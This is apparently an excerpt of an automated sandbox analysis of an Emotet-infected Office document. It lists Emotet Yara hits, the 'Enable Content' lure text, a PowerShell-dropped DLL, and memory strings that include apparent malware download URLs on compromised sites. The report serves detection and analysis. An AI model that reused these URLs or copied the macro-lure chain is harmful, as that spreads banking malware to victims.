Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp	String found in binary or memory: https://shop.nowfal.dev/wp-includes/RlMObf2j0/
Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: https://traumfrauen-ukraine.de
Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: https://traumfrauen-ukraine.de/bin/JyeS/
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp	String found in binary or memory: https://www.catcert.net/verarrel05
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp	String found in binary or memory: https://www.netlock.hu/docs/
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp	String found in binary or memory: https://www.netlock.net/docs

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000016.00000002.2368006651.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2369643612.0000000000180000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2339483010.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2352976974.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2363852482.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2370162675.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2333967935.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2342378229.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2347071363.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2485894589.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2368454329.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2335519485.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2351415450.0000000000750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2358322887.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2370274121.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2486292831.0000000002010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2355550940.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2343974004.00000000004A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2368531156.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2360129710.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2338149952.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2343885574.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2359551824.0000000000460000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2364687136.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2355569966.0000000000750000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2352906309.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2351067576.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2333875086.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2355670534.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2342497051.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2367980145.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2338123179.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2335352749.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2339586653.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2330883211.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2339441337.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2485863461.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2347031079.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2348536550.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2360111276.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2358696763.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2360228021.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2352930564.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2351291099.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2348563781.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2343843229.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2348503069.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 20.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.430000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.930000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.550000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.280000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.930000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.4a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.2010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.4a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.2010000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.460000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.550000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing and Enable Content. 0 Page, I of I Words: 8,746 ,9 N@m 13 ;a 10096 G) FI G)
Source: Screenshot number: 4	Screenshot OCR: Enable Content. 0 Page, I of I Words: 8,746 ,9 N@m 13 ;a 10096 G) FI G) ,, . ZE iss ,,gS
Source: Screenshot number: 8	Screenshot OCR: Enable Editing and Enable Content. a nmmm O I @ 100% G) A GE)
Source: Screenshot number: 8	Screenshot OCR: Enable Content. a nmmm O I @ 100% G) A GE)
Source: Document image extraction number: 0	Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 0	Screenshot OCR: Enable Content.
Source: Document image extraction number: 1	Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 1	Screenshot OCR: Enable Content.

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll

Jump to dropped file

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 5669
Source: unknown	Process created: Commandline size = 5568
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5568	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Eahqlsuythns\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00436417	7_2_00436417
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0044A0F1	7_2_0044A0F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00434844	7_2_00434844
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043E044	7_2_0043E044
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00445250	7_2_00445250
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00440672	7_2_00440672
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043BE74	7_2_0043BE74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043327F	7_2_0043327F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0044AA7B	7_2_0044AA7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00442C05	7_2_00442C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00431806	7_2_00431806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00432208	7_2_00432208
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043240F	7_2_0043240F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043E612	7_2_0043E612
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00435418	7_2_00435418
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043A821	7_2_0043A821
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00440223	7_2_00440223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0044D02D	7_2_0044D02D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00448C2B	7_2_00448C2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00444C37	7_2_00444C37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00442631	7_2_00442631
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00448A33	7_2_00448A33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043A6C9	7_2_0043A6C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043A2D2	7_2_0043A2D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0044C6D9	7_2_0044C6D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043D2DD	7_2_0043D2DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0044D4E1	7_2_0044D4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043D6F0	7_2_0043D6F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043ECFE	7_2_0043ECFE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043DE81	7_2_0043DE81
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00441090	7_2_00441090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00444A9E	7_2_00444A9E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043CAA3	7_2_0043CAA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043C145	7_2_0043C145
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0044434E	7_2_0044434E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00443F4F	7_2_00443F4F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00449B4A	7_2_00449B4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0044135B	7_2_0044135B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0044B165	7_2_0044B165
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0044A966	7_2_0044A966
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043C364	7_2_0043C364
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043F369	7_2_0043F369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00433B74	7_2_00433B74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00437378	7_2_00437378
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00435B7D	7_2_00435B7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00444F04	7_2_00444F04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00439106	7_2_00439106
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00435F04	7_2_00435F04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0044D70B	7_2_0044D70B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043A525	7_2_0043A525
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00439D2F	7_2_00439D2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00437731	7_2_00437731
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0044CF31	7_2_0044CF31
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00433336	7_2_00433336
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00437B39	7_2_00437B39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00433938	7_2_00433938
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0044DBC4	7_2_0044DBC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_004357D4	7_2_004357D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00432DDF	7_2_00432DDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00446BE4	7_2_00446BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0044CBE7	7_2_0044CBE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043F5E0	7_2_0043F5E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_004367EF	7_2_004367EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0044BBF1	7_2_0044BBF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00441DFE	7_2_00441DFE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00437FFE	7_2_00437FFE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_004335FC	7_2_004335FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00447187	7_2_00447187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00441F88	7_2_00441F88
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00440B8A	7_2_00440B8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00434D90	7_2_00434D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00443590	7_2_00443590
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043BB96	7_2_0043BB96
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0044C192	7_2_0044C192
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00442FA1	7_2_00442FA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00433FAF	7_2_00433FAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043ADAF	7_2_0043ADAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_004493AA	7_2_004493AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_004447B5	7_2_004447B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043F9BA	7_2_0043F9BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043FFBA	7_2_0043FFBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00447BBE	7_2_00447BBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00449DBF	7_2_00449DBF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_004409B8	7_2_004409B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0017C017	7_2_0017C017
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00184012	7_2_00184012
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00180604	7_2_00180604
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00179C3D	7_2_00179C3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0017C851	7_2_0017C851
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0018CA55	7_2_0018CA55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00179846	7_2_00179846
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0018BC4D	7_2_0018BC4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00184478	7_2_00184478
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0017E272	7_2_0017E272
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0018CC7F	7_2_0018CC7F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00175478	7_2_00175478
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00189665	7_2_00189665
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00179A99	7_2_00179A99
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001890BE	7_2_001890BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001834BF	7_2_001834BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0017B6B9	7_2_0017B6B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00176CA5	7_2_00176CA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001792A3	7_2_001792A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001770AD	7_2_001770AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00172EAC	7_2_00172EAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0018C4A5	7_2_0018C4A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001728AA	7_2_001728AA
